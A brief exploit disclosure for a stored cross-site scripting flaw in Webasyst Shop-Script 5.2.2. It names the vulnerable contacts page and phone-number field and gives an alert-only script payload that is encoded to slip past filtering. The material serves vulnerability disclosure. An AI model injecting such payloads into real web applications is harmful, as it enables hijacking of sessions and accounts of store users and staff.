Exploit Title:webasyst shop script stored xss

# Date: 8/12/2014
# Exploit Author: Ankit Bharathan
# Description: shop-Script 5
Emerging PHP ecommerce framework
that helps you increase sales.Feature-rich PHP shopping cart solution
& ecommerce framework developed in 2013--2014. One of the leading
shopping cart solutions of Russia. Over 2500 live stores.
# Vendor Homepage: http://www.shop-script.com/
# Software Link: http://www.webasyst.com/download/framework/shop/

# Version:5.2.2.30933
# Tested on: windows 7
# CVE :
#exploit:http://localhost/phpecom/index.php/webasyst/contacts/  add new
contact from above link and  fill the phone number field with
<svg><script>alert&#40/1/&#41</script><svg>
booom ;)
screenshot:http://prntscr.com/4cc4za